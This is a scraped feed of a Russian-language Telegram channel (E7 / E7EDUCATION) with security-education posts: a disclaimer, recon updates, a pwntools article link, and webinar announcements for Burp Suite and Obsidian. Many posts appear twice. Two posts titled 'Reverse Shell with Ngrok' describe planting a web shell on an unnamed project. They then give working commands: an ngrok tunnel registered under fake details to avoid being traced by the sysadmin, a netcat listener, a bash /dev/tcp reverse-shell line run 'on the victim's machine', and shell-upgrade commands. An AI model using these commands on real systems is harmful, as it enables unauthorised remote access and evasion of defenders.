🔥Также хотим уведомить,
E7 никогда не производит атаки на любые гос проекты
Будь то это Российских или других стран
Всё что может произойти якобы от нашего имени - никак не относится к нам
❗️Ответственность за что либо мы не берём, будьте внимательны прежде чем осуждать проект
Мы за развитие ИБ в том числе и пентеста в СНГ пространстве!
Мы работаем в BugBounty системе, и в системе тестирования коммерческих проектов 💥
E7 никогда не производит атаки на любые гос проекты
Будь то это Российских или других стран
Всё что может произойти якобы от нашего имени - никак не относится к нам
❗️Ответственность за что либо мы не берём, будьте внимательны прежде чем осуждать проект
Мы за развитие ИБ в том числе и пентеста в СНГ пространстве!
Мы работаем в BugBounty системе, и в системе тестирования коммерческих проектов 💥
👍9🔥6❤3🕊1
Стадию Recon провели успешно, нашли очень много интересных вещей, за которые можно ухватиться
Из ныне популярных сканеров можно выделить работу c Acunetix, с ним поработали славно
Про другие сканеры тоже не забываем, ведь где один отстает, другой преуспевает.
Для удобства восприятия ведем отчетность в Obsidian. Крайне приятная тулза, берите себе на вооружение #Obsidian
Продолжаем держать в курсе событий, следите за будущими обновлениями
Из ныне популярных сканеров можно выделить работу c Acunetix, с ним поработали славно
Про другие сканеры тоже не забываем, ведь где один отстает, другой преуспевает.
Для удобства восприятия ведем отчетность в Obsidian. Крайне приятная тулза, берите себе на вооружение #Obsidian
Продолжаем держать в курсе событий, следите за будущими обновлениями
E1tex | E7EDUCATION SUBSCRIBE👍10
PWN PYTHON. Модуль для CTF
В данной статье познакомимся с таким инструментом как pwntools для написания эксплоитов.
Читать
В данной статье познакомимся с таким инструментом как pwntools для написания эксплоитов.
Читать
Telegraph
PWN PYTHON. Модуль для CTF соревнований.
Всем привет ! В данной статье познакомимся с таким инструментом как pwntools для написания эксплоитов. О pwntools Исторически pwntools использовался как своего рода DSL для написания эксплойтов. Чтобы начать пользоваться, импортируем модуль from pwn import…
👍6
Всем здравия! 🔥
В эту субботу мы проведём вебинар: Burpsuite - как инструмент для хакера
Вебинар рассчитан на новичков, мы разберём с вами принцип действия инструмента, как с ним правильно работать, сделаем краткий обзор возможностей этого прекрасного инструмента!
Вебинар будет в нашем чате в формате конференции - @E7CHAT ❤️🔥
Дата: 01.10.22
Время начала: 18:00 (мск)
❗️Вебинар будет проводить:
Обладатель сертификата PRTT
Админ и спикер - под ником: CORS
В эту субботу мы проведём вебинар: Burpsuite - как инструмент для хакера
Вебинар рассчитан на новичков, мы разберём с вами принцип действия инструмента, как с ним правильно работать, сделаем краткий обзор возможностей этого прекрасного инструмента!
Вебинар будет в нашем чате в формате конференции - @E7CHAT ❤️🔥
Дата: 01.10.22
Время начала: 18:00 (мск)
❗️Вебинар будет проводить:
Обладатель сертификата PRTT
Админ и спикер - под ником: CORS
👍20🔥9
🔥Уже через час состоится наш вебинар по теме: «Burpsuite - как инструмент для хакера»
Вебинар будет в нашем чате в формате конференции - @E7CHAT ❤️🔥
Время начала вебинара: 18:00 (мск)
❗️Вебинар будет проводить: Обладатель сертификата PRTT
Админ и спикер, под ником - CORS
Вебинар будет в нашем чате в формате конференции - @E7CHAT ❤️🔥
Время начала вебинара: 18:00 (мск)
❗️Вебинар будет проводить: Обладатель сертификата PRTT
Админ и спикер, под ником - CORS
👍6
Мнение по поводу вебинара
🔥Пришли 75 человек, ребята, спасибо вам огромное за внимание!
Коротко разобрали что такое Burp Suite, что им можно делать и как. Возможности этого инструмента в тестировании веб-приложений действительно впечатляют.
Запись вебинара появится на ютубе, в течение пары дней
Ждем вас на следующих вебинарах! Запустим информационную безопасность в массы! 🛡
🔥Пришли 75 человек, ребята, спасибо вам огромное за внимание!
Коротко разобрали что такое Burp Suite, что им можно делать и как. Возможности этого инструмента в тестировании веб-приложений действительно впечатляют.
Запись вебинара появится на ютубе, в течение пары дней
Ждем вас на следующих вебинарах! Запустим информационную безопасность в массы! 🛡
Cors | E7EDUCATION SUBSCRIBE👍32🔥5❤2
🔥6👍1
Reverse Shell с Ngrok часть 1
Одним прекрасным рабочим вечером обрабатывали с ребятами интересныйnoname проект. Все шло по плану, рекон провели, сфаззили, прокинули веб-шелл, но его оказалось недостаточно, да и как-то не по человечески все это выглядело.. Хотелось красоты!
Решили прокинуть реверс и встряли ненадолго, аренда дедика как назло закончилась, а на основной машинке с ВПНом то айпишник приватный, ничего не сделать.
Благо быстро вспомнили про такую штуку как Ngrok
20 сердец и выкладываю инструкцию в следующей части
Одним прекрасным рабочим вечером обрабатывали с ребятами интересный
Решили прокинуть реверс и встряли ненадолго, аренда дедика как назло закончилась, а на основной машинке с ВПНом то айпишник приватный, ничего не сделать.
Благо быстро вспомнили про такую штуку как Ngrok
20 сердец и выкладываю инструкцию в следующей части
E1tex | E7EDUCATION SUBSCRIBE❤81
RESOLUTE ATTACK
Reverse Shell с Ngrok часть 1 Одним прекрасным рабочим вечером обрабатывали с ребятами интересный noname проект. Все шло по плану, рекон провели, сфаззили, прокинули веб-шелл, но его оказалось недостаточно, да и как-то не по человечески все это выглядело..…
Опять обманул, ещё 10 и
выкладываем 😂😉
До 50 добиваем
выкладываем 😂😉
До 50 добиваем
⚡9❤6
Reverse Shell с Ngrok часть 2
Благо быстро вспомнили про такую штуку как Ngrok. Сейчас распишу краткий гайд для работяг, чтобы при занятиях этичным хакингом не тратили время на такие пустяки)
Инструкция:
1. Скачиваем ngrok
2. Пока скачивается, регаемся с левыми данными
Мы же не хотим, чтобы злой сисадмин нашел вас чтобы сказать пару ласковых))
3. Коннектимся к аккаунту - ngrok config add-authtoken {ВАШ_ТОКЕН}
Токен будет в ЛК на сайте
4. Запускаем Ngrok для получения публичной TCP ссылки - ./ngrok tcp <ПОРТ>
Порт выбираем любой, на ваш вкус
5. Запускаем через неткат слушалку на том же порте - nc -lnvp {ВАШ_ПОРТ}
6. На машинке жертвы выполняем - bash -c 'exec bash -i &>/dev/tcp/{ВАША_ПУБЛИЧНАЯ_ЛИНКА_НГРОК}/{ПУБЛИЧНЫЙ_TCP_ПОРТ_НГРОК} <&1'
7. Вводим для удобства данные команды уже непосредственно в нашем реверс шелле:
export TERM=xterm256-color
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
Приятной работы, добрые хакеры!
Благо быстро вспомнили про такую штуку как Ngrok. Сейчас распишу краткий гайд для работяг, чтобы при занятиях этичным хакингом не тратили время на такие пустяки)
Инструкция:
1. Скачиваем ngrok
2. Пока скачивается, регаемся с левыми данными
Токен будет в ЛК на сайте
4. Запускаем Ngrok для получения публичной TCP ссылки - ./ngrok tcp <ПОРТ>
Порт выбираем любой, на ваш вкус
5. Запускаем через неткат слушалку на том же порте - nc -lnvp {ВАШ_ПОРТ}
6. На машинке жертвы выполняем - bash -c 'exec bash -i &>/dev/tcp/{ВАША_ПУБЛИЧНАЯ_ЛИНКА_НГРОК}/{ПУБЛИЧНЫЙ_TCP_ПОРТ_НГРОК} <&1'
7. Вводим для удобства данные команды уже непосредственно в нашем реверс шелле:
export TERM=xterm256-color
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
Приятной работы, добрые хакеры!
E1tex | E7EDUCATION SUBSCRIBE❤18⚡4👍3
Всем здравия! 🔥
В эту субботу мы проведём вебинар на тему: Организация рабочего процесса - Obsidian
Вебинар будет полезен как новичкам, так и действующим специалистам
Мы разберём с вами принцип действия инструмента, примеры использования, расскажем и наглядно покажем как работать с инструментом
Вебинар будет проходить или в нашем чате, или на нашем ютуб канале ❤️🔥
(Информацию напишем завтра в течении дня)
Дата: 08.10.22
Время начала: 18:00 (мск)
❗️Вебинар будет проводить:
Обладатель сертификата PRTT
Действующий кодер и пентестер
Админ и спикер - под ником: E1TEX
В эту субботу мы проведём вебинар на тему: Организация рабочего процесса - Obsidian
Вебинар будет полезен как новичкам, так и действующим специалистам
Мы разберём с вами принцип действия инструмента, примеры использования, расскажем и наглядно покажем как работать с инструментом
Вебинар будет проходить или в нашем чате, или на нашем ютуб канале ❤️🔥
(Информацию напишем завтра в течении дня)
Дата: 08.10.22
Время начала: 18:00 (мск)
❗️Вебинар будет проводить:
Обладатель сертификата PRTT
Действующий кодер и пентестер
Админ и спикер - под ником: E1TEX
👍18🔥9